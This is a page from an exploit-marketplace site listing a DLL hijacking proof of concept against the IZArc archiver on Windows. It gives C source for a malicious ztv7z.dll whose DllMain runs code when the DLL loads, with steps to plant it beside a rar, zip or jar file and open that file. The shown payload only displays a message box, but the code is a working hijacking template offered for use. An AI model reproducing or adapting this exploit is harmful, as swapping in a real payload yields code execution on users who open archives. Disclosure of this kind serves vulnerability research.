[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

IZArc DLL Hijacking (ztv7z.dll) Exploit

Author
secuid0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14006
Category
local exploits
Date add
06-09-2010
Platform
windows
=======================================
IZArc DLL Hijacking (ztv7z.dll) Exploit
=======================================

/*
Exploit Title: IZArc DLL Hijacking Exploit (ztv7z.dll)
Date: 01/09/2010
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Software Version: IZArc 4.1.2.2012
Vendor Site: http://www.izarc.org/
Vulnerable Extensions: rar, zip, jar (and probably many more)
Tested Under: winxp_sp2_gdr.050301-1519

Instructions: 
1. Compile the following code
2. Create a file of the affected extensions in the same directory as the dll
3. Execute file.<extension>
*/

#include <windows.h>

int dll_m0nk()
{
    MessageBox(0, "IZArc is vulnerable to DLL Hijacking", "secuid0", MB_OK);
	return 1;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	dll_m0nk();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}



#  0day.today [2024-12-27]  #